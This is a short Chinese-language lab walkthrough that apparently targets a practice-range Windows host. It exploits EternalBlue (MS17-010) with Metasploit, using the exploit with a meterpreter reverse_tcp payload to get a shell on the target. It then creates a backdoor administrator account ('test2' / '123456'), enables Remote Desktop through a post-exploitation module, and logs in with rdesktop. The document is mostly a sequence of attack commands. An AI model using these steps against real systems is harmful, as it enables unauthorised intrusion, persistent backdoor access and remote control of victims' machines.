永恒之蓝漏洞

SMB协议

用于共享文件夹

添加用户test2(win下):

1
net user test2 123456 /add

将用户加入管理员组:

1
net localgroup administrators test2 /add


添加成功

创建一个文件夹用于共享

访问共享文件夹:Win+R,输入 \\ip-address\path

在虚拟机中尝试访问:

查看445端口占用情况:

1
netstat -ano | grep 445

靶场中漏洞利用

拓扑图

打开msfconsole

1
2
msfconsole -q
# -q表示不输出信息

不使用-q

使用-q

扫描永恒之蓝漏洞

搜索永恒之蓝漏洞ms17-010

1
search ms17-010

使用扫描工具

1
2
use 3
# 也可以打全称

设置远程主机的ip并执行

1
2
set RHOSTS 192.168.2.169
run

利用永恒之蓝漏洞

利用永恒之蓝漏洞进行攻击,这里我们使用第0个工具

1
use 0

注意这里defaulting to后的工具,我们待会儿将使用这个进行反向连接(因为需要受害者主机连接到我们监听的端口)

1
2
3
set RHOSTS 192.168.2.169
set payload windows/x64/meterpreter/reverse_tcp
run

创建后门账户

1
shell

现在输出的都是乱码,我们不喜欢,改一下

1
chcp 65001

解决了乱码问题

现在创建一个后门用户

1
2
3
net user test2 123456 /add
# 加入管理员组
net localgroup administrators test2 /add


退出shell

1
exit

开启远程桌面

meterpreter中:

1
run /post/windows/manage/enable_rdp

新建一个终端

1
rdesktop 192.168.2.169

成功进入后门用户